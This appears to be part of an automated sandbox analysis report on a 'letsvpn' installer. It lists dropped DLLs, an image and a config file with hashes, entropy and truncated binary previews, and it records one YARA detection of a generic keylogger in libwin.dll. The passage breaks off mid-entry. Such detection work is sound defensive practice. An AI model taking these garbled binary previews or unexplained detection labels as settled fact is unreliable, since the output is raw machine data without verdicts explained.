                                                                                                                                                                                                  SSDEEP:768:or7hqeNzclb+af/wFGfdpOOJWOQE9/TBLW/Uwm0q3b2KZBZgS+ST6nk7:or7hqeNzclR/CWpKsRBLW/Ef3qKW/m9
                                                                                                                                                                                                  MD5:CA100065CAC383E78E4FAFC5610FA289
                                                                                                                                                                                                  SHA1:57AB1CF0E9FE01100DB886C2C639BE85CCA96679
                                                                                                                                                                                                  SHA-256:3F3E6F279A50164480B76A204969339069409AC164A1DCAA9329D552B92B288D
                                                                                                                                                                                                  SHA-512:E3C8ACE8EBCBA78335436451449F6CAD5895E82DEFD8C7B8AE26656C3A70AA2D76EA6AD81D3B816F00CC4D493B93DB7D943A43B504460A53EE3B3214FBD37C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.........." ..0..$...........C... ...`....... ....................... ............@..................................C..O....`.................. ...........hB............................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc..............................@..B.................C......H........N...n..................A......................................f.s....}.....(......}....*v.(.....{.....o.........o....*.0...........{..........(.....{....,..k.(......o....%-.&s.......}......o....}.....{.....o....o......o.....o.....o.....o.....s....}.......,..(.....*.........s|.......0..T.......s....%(....o....o......{.....o.....o....-.r...pr'..ps....z.o....-.re..pr'..ps....z.*J.{....%-.&*.o....*..{....*..0..M........{....-D..}.....{....%-.&+.(....%-.&+.o.....{....%-.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):130080
                                                                                                                                                                                                  Entropy (8bit):5.9702765639204065
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:/Ax1gFvyQ1P7QozISTBCW1Nt+Gi/yOWi1/Xg6iyhUkuXlf/m:/EwJjRB5z2
                                                                                                                                                                                                  MD5:0E444739D07678A3F6EA4202C4237832
                                                                                                                                                                                                  SHA1:0689C9CDAD379B4B0952674A7BF75A5A1F2F33A9
                                                                                                                                                                                                  SHA-256:A3AAB8CA7B0747242207D1223E241E602B45BA69F25BA5B611A12EEACD19EC1A
                                                                                                                                                                                                  SHA-512:85F6D4920D93F8EE2BB7A384424C9EEA25CC5591BF7A7301BDC31170944549B3860A90C5694F194EE0F9CD85F0EA053E89039F95FF806B735E526D583EE7E0BF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q............." ..0.................. ........... .......................@.......i....`.................................U...O.......\............... .... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc....... ......................@..B........................H...........8...........................................................0..........s......(8....j........(9...&...(.......0o.........+,.....o ...o!...o"...&...2..r...po"...&...Y...../..0...r...p(#.....(1....r5..po"...&...o$...o"...&...o$...*..........ag.0.....0..j.......~%....rQ..prY..ps&...%.o'...%.o(...%.o)...(*.....o+...o,.......,..o-........r_..p(#....(1...r...p.s....z.*........0..>..........DJ.......0..........s/....(......l...%....%....o0......+r.....(1...-b...l...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\View\Assets\notification_icon.png

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12243
                                                                                                                                                                                                  Entropy (8bit):7.820583648387655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WLj1H8FzmdclL4jx3c4yrJuhRof6YQURyMGf0gDSvGrEHsf8Aw47b:QpiYccZrZRof6YQUPPgDSvGr+q8D47b
                                                                                                                                                                                                  MD5:AA3CFA4A176584F79EEE7F74032E446F
                                                                                                                                                                                                  SHA1:752B97FF9A8D28E92F6FB35EE24FF3DA2E8DEEE5
                                                                                                                                                                                                  SHA-256:34A9425F58EDB250E7FBD9217D73A5AD96D1986ACA3520AFE8CADB66E32E3F33
                                                                                                                                                                                                  SHA-512:A824DA84DEDAFCDCEACDF9D602B5F89526168E6350E7478D31A5562A8B12D496FB5205B62EDFB2DF1C3896D6B24DA761A1211CF342C1AFF8E6235C4569A54BFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.PNG........IHDR.............k.XT....PLTE....g.H.\...O..E..E.jj..D..E.Q..rb.S...D.tc..H.H.P..ni.T..S...H.Q...F.N..L.N...E.....D.M..Y..yS.uW.O..S..ig.q[..D..H....}P.lc..D.T..bv.en.gk.n_.Q..]...L..D.D.D.D.[...N..D.F.[..cr..D.V...E.D.D.Y...D..D.P.._}..L..D..C..D..D.D.W...D.G.I..D.`z..D..D..E.D.m...D..D..C..G.o...C..N..O.w{.t...[.j..]...R.q..c...U..Q..N..i..Y..`..S..N.zw..n..N.g...N..N.|r..N.N.....V..N..N....^..a..d...N.g......N.N.O..N.M.O.O.d..O.......U...N....z?.LN.n>....O..w..kb...eP.`2.`D.sq..*.....*..7.....W.w^.T=...sJ....f..xj....bk..$.....&.[[..&....g$.....u...m.....B......Vj..8.I....'.mx......1.k..Oy.........j.... .:..Fb..1....\.....@u.. .....H.L...f.-.........I.t".......g..1....G...(.E..........8..w...y....9..I.....i..............k......}...b..E.....tRNS..*-.L...O...QQ..........'^..,iIDATx...MH.A.....].U3.Xw....B.*2..K...A..i.%F...BWA..3.K..H...u.P...C..I..K..<...w....C_........>.../...+**+..v.@m..N.X.XG.qt.i.k+...(jX*Q

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73760
                                                                                                                                                                                                  Entropy (8bit):6.270537704846323
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DXSaVnItYw1N0tUUTAz/kI5JIol/NkIgJ4Wj3qKK/mS:D5VnqzNaNE4IvIolSIgJjje/9
                                                                                                                                                                                                  MD5:A0442D522D6D577EB8727E1F1019413B
                                                                                                                                                                                                  SHA1:D39D4879650B86A7B9EEFD44418236432E84AAA3
                                                                                                                                                                                                  SHA-256:B4876C4E26053DDC8E3D198C20E2EB0A45D4B0A935AB7493CC7C5B41F93FAE67
                                                                                                                                                                                                  SHA-512:9C024876A876FE3B9F708EB9B3F6BAA3BBD3984542CD8F6DFFB16BEF693E40754371D5FA780EF204DDD09B37D2C1C0B68C18AB6D93CF969732F9CBD046A27CA9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*FqZ.........." ..0.............V.... ... ....... .......................`............`.....................................O.... ..4............... ....@....................................................... ............... ..H............text...\.... ...................... ..`.rsrc...4.... ......................@..@.reloc.......@......................@..B................6.......H.......4k...............................................................{....*"..}....*..{....*"..}....*V.(......(......(....*:.(......(....*..{....*"..}....*Z...o....&.~....o....&*Z...o....&.~....o....&*V..o....&.~....o....&*6.~....o....&*...0...........~....Q..~......s.....8.....P(....,...Q8.....r...po....,..(....-&....o....-..*.....o....( ...o!...8......:o"........?........o#.......(....-...o..........Xo$.......(....-"..r...po....,...o%....1....o$.......(....-1.....o....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.372264039844505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:hDcl7W1UiZTo1ooEqzW3SQwiNsI8l5wwyvUPrYZBkcDTq3b2KZBZuS+ST6nkW:h8QpZTsooEX3SQwr9y4UZRDu3qKA/m0
                                                                                                                                                                                                  MD5:1CE428CFF43522A1AF4FACB23F71D608
                                                                                                                                                                                                  SHA1:C8F354FBDFB68B356CB4146A1EE945A2375FBAD5
                                                                                                                                                                                                  SHA-256:2956DDEB4C4D1284C52A099305DA39243888F9DAD5A15284C89A2D2238E07107
                                                                                                                                                                                                  SHA-512:06CFA947BB50B6E5A346ED6B390DEC8A0004B282A306B9F8F3CA69EF4587AAFEDC42536C12308BDFF57261F586C9481C7C3961188AAE4BE5C19C4CF7102CDDB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ........... ..............................tB....@.................................J...O.......$............... ...........h...T............................................ ............... ..H............text........ ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B................~.......H........H..Hq...........................................................{....*..{....*V.(......}......}....*...0..;........u......,/(.....{.....{....o....,.(.....{.....{....o....*.*. ...' )UU.Z(.....{....o....X )UU.Z(.....{....o....X*.0...........r...p......%..{.....................-.q.............-.&.+.......o ....%..{.....................-.q.............-.&.+.......o ....(!...*.0..2..........(....~.......o"...-.~.....s#...%.o$.....o%...&*...0..A..........(....~.......o"..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) Aarch64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):127008
                                                                                                                                                                                                  Entropy (8bit):6.1002030171865975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:7DdMkQCUK86ryzDWs0MxThVvTe6sWkddGDGEtg3q2LOOCN+y3qKI/m2T:7Ddef+yR17exwDGEtg3q2LOdN+yU/lT
                                                                                                                                                                                                  MD5:549B6EC92306E2450F143AA585DF6DB2
                                                                                                                                                                                                  SHA1:E3AC456C76C4977E9C33A69DD649F13628C10686
                                                                                                                                                                                                  SHA-256:9C5602FEABC5C7C4D96551400282CAE11E740D87141476DCE5C7B5060EF5AEA0
                                                                                                                                                                                                  SHA-512:3ECA35112F57FC3DCDD25CD554A7E8F53F01DED73241027CD5C6C2EA57EE1B061C2D7DCE8B33716A615C2233B8C268712125FDFD0F800E42FCA8EE872495A04C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......`.........." ................ C....................................... ......rS....`A........................................_.......Q...(...............(....... .......|..........................@...(... !..0...................P........................text............................... ..`.rdata...... ......................@..@.data...|...........................@....pdata..(...........................@..@.00cfg..............................@..@.tls................................@....rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\cs\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.786293052327813
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JEZLkwA5qKV3XWe6lW1hqWOHlLf2KQcvBZ9YsTS+ShjmM6IGBkSS:yxkwAlaQq3b2KZBZtTS+ST6nkJ
                                                                                                                                                                                                  MD5:489C8B9F4E37E1D1FEF662341FC3F95A
                                                                                                                                                                                                  SHA1:3AE58E1054B8D994F1E2D26402BA285F16257116
                                                                                                                                                                                                  SHA-256:30290D2070FB124A2BD8DB48B11CFBEA21B0AFD5BDC28F3401FEDD8C3F9B66A8
                                                                                                                                                                                                  SHA-512:7D6C7A93ED7CE939DFF8BEBB5FD5F5687E8A877A7019ACEF0E4F2797001657561CB55B834BE9BCFE2DED8FA23F8CA5C8C96EFAD6EE71D1E6AB5800E82ACC529A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............8... ...@....... ....................................@.................................D8..O....@...............$.. ....`......(8............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................x8......H.......P ...............%.......7......................................BSJB............v4.0.30319......l...D...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\de\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.788421298560347
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4qmGsHW08We6lWMhqWOHlLf2KQcvBZ9DjqgS+ShjmM6IGBkSZRI:4BGsH1xHq3b2KZBZFlS+ST6nkGI
                                                                                                                                                                                                  MD5:D8C061C0526368E2A9D9B90BAE61E764
                                                                                                                                                                                                  SHA1:E83C1F781F339BC06A3FE0E27701869EE79B177C
                                                                                                                                                                                                  SHA-256:39D5F8E342DB9B9A694944D03099EB2C6CCAE1F926D829858D216985A54066F7
                                                                                                                                                                                                  SHA-512:D15944E01ADEFACCED782C9BA76851EE025A93AD6D5FE52392834A9D88AEDABBA39BE3B83B75A37C3D52B4DA67B83961237486300A9B8DC97605CAEACA055D3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G),..........." ..0..............9... ...@....... ....................................@..................................9..O....@...............$.. ....`.......9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%..8....9......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3....................................../.......................u...........].....].....]...D.]...a.].....]...-.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\es\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.754267815741174
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:611LpDt4We6lWHhqWOHlLf2KQcvBZ9AE9S+ShjmM6IGBkSZ:iBdqq3b2KZBZB9S+ST6nkK
                                                                                                                                                                                                  MD5:335DDC15C604733F3A3A74150F7EE386
                                                                                                                                                                                                  SHA1:017B875AD2AF40A2245DA464A34572509007D6CB
                                                                                                                                                                                                  SHA-256:514D89ED6AC01AE7B71A64C36B0A40FEC69973F5E0D4BB42DA8CF2DBA9278E0F
                                                                                                                                                                                                  SHA-512:208135523870EDC892F236B20C8C1B49E2922C888C6BC9403CC29F7BFF6A94FB41D69AFCD427A102E9016B032DC56424EFE4BC458974058ACF47398DA2BA939D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k2............" ..0.............69... ...@....... ..............................S.....@..................................8..O....@...............$.. ....`.......8............................................... ............... ..H............text...<.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%..x...H8......................................BSJB............v4.0.30319......l...D...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\fr\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.791970793161073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LsxhehdMDxbFWe6lW5hqWOHlLf2KQcvBZ9XKiNS+ShjmM6IGBkS4:4vy+DA4q3b2KZBZbS+ST6nkr
                                                                                                                                                                                                  MD5:63C242659089C61B00298F898CED5B2E
                                                                                                                                                                                                  SHA1:97104D6BAC9B264B9CEE15F2C4B82ABE80872192
                                                                                                                                                                                                  SHA-256:706ECAC3AB9529F2AA8782D9CDAC358225436850685F98FEA7B557A89941A86B
                                                                                                                                                                                                  SHA-512:A0E5D459839FD79E0E2CC58EB1B956D931503710DE3E0A733F6DD5E29787CFE9D6562FEB49421C220E0F5C013F028B9E88C61FBD837D91799B7C98992942E51E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,E..........." ..0..............9... ...@....... ....................................@.................................`9..O....@...............$.. ....`......D9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................l.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\it\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.755805881100906
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:79WLKzFWe6lWUhqWOHlLf2KQcvBZ9lhbS+ShjmM6IGBkS8b:5gKz+rq3b2KZBZ1bS+ST6nkfb
                                                                                                                                                                                                  MD5:4E8BBD3CFDFF50E0E2A8F1CF7D7C0B1B
                                                                                                                                                                                                  SHA1:6C9BEEA42873A8367AA26CA6151176EEFFB69331
                                                                                                                                                                                                  SHA-256:850A6C7B1D216178671F60C56295CECE8B801F3801CD2670C0193E29DC9ED91B
                                                                                                                                                                                                  SHA-512:7D0722A6CBEA607B56C0FE5D11A31EC44314F3A694D1E45811C02EEF96D7151B700D202F39DD3DEE80BF4C2118AA8892F1464FAC74469855E70C34111E2BC7A4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(............." ..0..............9... ...@....... ..............................M%....@.................................09..O....@...............$.. ....`.......9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................d9......H.......P ...............%.......8......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................r...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................l.....l.....l...).l...1.l...9.l...A.l...I.l...Q.l...Y.l.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ja\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.900258148465496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rNeZmFLRnyGO00Ik4oF3eUntWe6lWdhqWOHlLf2KQcvBZ9bxJS+ShjmM6IGBkS8:rQZmFLRnyGO00Ik4oF3eUnGYq3b2KZB+
                                                                                                                                                                                                  MD5:1CE86E199C50E28E4423BCDEC3B337C5
                                                                                                                                                                                                  SHA1:8EF284E87F8D9C1C0B78F826DBC42A381D753C73
                                                                                                                                                                                                  SHA-256:52D25AE7CF6ECC8746DDCFF279766A59162EE1A8D25FD7424E7A27E76EA9E7CA
                                                                                                                                                                                                  SHA-512:731C04BA44CEE917C3A255AD534C325D1511A1151CA4C304E18666AD28EA650A3A280A257E3E2C865D0F12A97AB5246500B8F97ED51E4A1A9121DDAEF38E9C94
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.............2=... ...@....... ....................................@..................................<..O....@...............(.. ....`.......<............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H.......P ...............%..p...D<......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3....................................../.......................u...........].....].....]...D.]...a.].....]...-.].................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@...................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ko\System.Web.Services.Description.resources.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.9205398032930345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:xPP73AIGoWe6lWYhqWOHlLf2KQcvBZ9c2MS+ShjmM6IGBkSl:xX7AIGNTq3b2KZBZ9MS+ST6nkC
                                                                                                                                                                                                  MD5:B54150F34E9E5ED23D69BD822937A52B
                                                                                                                                                                                                  SHA1:E2FF594B6D9BE3A90725B1BA169A9027ECA33ABC
                                                                                                                                                                                                  SHA-256:3E866F4F1F18EF5CF7C9F6E4BBEF74ACD69120004A52778A8FD7CFC6E14066A4
                                                                                                                                                                                                  SHA-512:CED65F0CAED6DE841339140294D707FF49BA89199B7891A95A5CE7047F5203CAF570EF5831533C94073D3A190321B6BAB4A4085A1923F218843D674E8F147FC9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9..........." ..0.............2;... ...@....... ...............................A....@..................................:..O....@...............&.. ....`.......:............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................;......H.......P ...............%..p...D:......................................BSJB............v4.0.30319......l...D...#~...... ...#Strings............#US.........#GUID...........#Blob......................3......................................,.......................u...........Z.....Z.....Z...A.Z...^.Z.....Z...*.Z.................o.....o.....o...).o...1.o...9.o...A.o...I.o...Q.o...Y.o.......................#.....+.....3.@...;.e...C.y...K.....S.@.....................l.............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10689056
                                                                                                                                                                                                  Entropy (8bit):6.3491186908804655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:GDzluVRWdkyvuIeBGrez6CYG7m68SxIc6b0tTziC002MZ:Mzln6aM1oC0JMZ
                                                                                                                                                                                                  MD5:ADABDAFF05BC4BA3CADF3A8F7248617F
                                                                                                                                                                                                  SHA1:0EEA8F9BE4CDF3D3933A35A2F2620C1E2AC57F4F
                                                                                                                                                                                                  SHA-256:75408CEC6E96255CDFA76163A26887E3DB726413CA5DF27A7331286282BB8450
                                                                                                                                                                                                  SHA-512:D792B6CBE8E29DC50FBC126C23535463E7F6E766DD7E9F5C6A63D476F7939DE8FC41EA17F8119858954638A591819F114794B6B26DBF240E408357A0D5D260B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...).*L.....<...........@L...8b................................T.....@... ...............................$.... ................. ....0..lM..................................................|..@............................text....)L......*L.................`..`.data...L....@L.......L.............@....rdata....N...O...N...O.............@..@.bss.....;...............................edata.............................@..@.idata..$..........................@....CRT....,...........................@....tls................................@....rsrc........ ......................@..@.reloc..lM...0...N..................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.config

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1510
                                                                                                                                                                                                  Entropy (8bit):5.153642637730153
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JdGw/e40s+FpMU+nHnUn+OtxXqY9JXMi7c+nHQ7qY/DJYLLYi:3Gw/x0s6peHhOtRPJX3rHSF6Lsi
                                                                                                                                                                                                  MD5:7A7521BC7F838610905CE0286324CE39
                                                                                                                                                                                                  SHA1:8AB90DD0C4B6EDB79A6AF2233340D0F59E9AC195
                                                                                                                                                                                                  SHA-256:2A322178557C88CC3C608101E8FC84BFD2F8FA9B81483A443BB3D09779DE218D
                                                                                                                                                                                                  SHA-512:B25DFDCE0977EAF7159DF5EABE4B147A6C0ADAC39C84D1C7A9FE748446A10C8D2E20D04CF36221057AA210633DF65F2A460821C8C79A2DB16C912EC53A714D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<log4net>....<logger name="logger">.....<level value="ALL" />.....<appender-ref ref="LogAppender" />....</logger>....<appender name="LogAppender" type="log4net.Appender.RollingFileAppender">.....<param name="File" value="Log\\" />.....<param name="AppendToFile" value="true" />.....<param name="MaxFileSize" value="10240" />.....<param name="MaxSizeRollBackups" value="100" />.....<param name="StaticLogFileName" value="false" />.....<param name="DatePattern" value="yyyyMMdd&quot;.log&quot;" />.....<param name="RollingStyle" value="Date" />.....<layout type="log4net.Layout.PatternLayout">......<param name="ConversionPattern" value="%d [Level: %-5p] [Thread: %t] [class.%c] [%x]: %m%n" />.....</layout>....</appender>....<appender name="TextAppender" type="log4net.Appender.RollingFileAppender">.....<param name="AppendToFile" value="true" />.....<param name="RollingStyle" value="Date" />.....<param name="DatePattern" value="&quot;

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
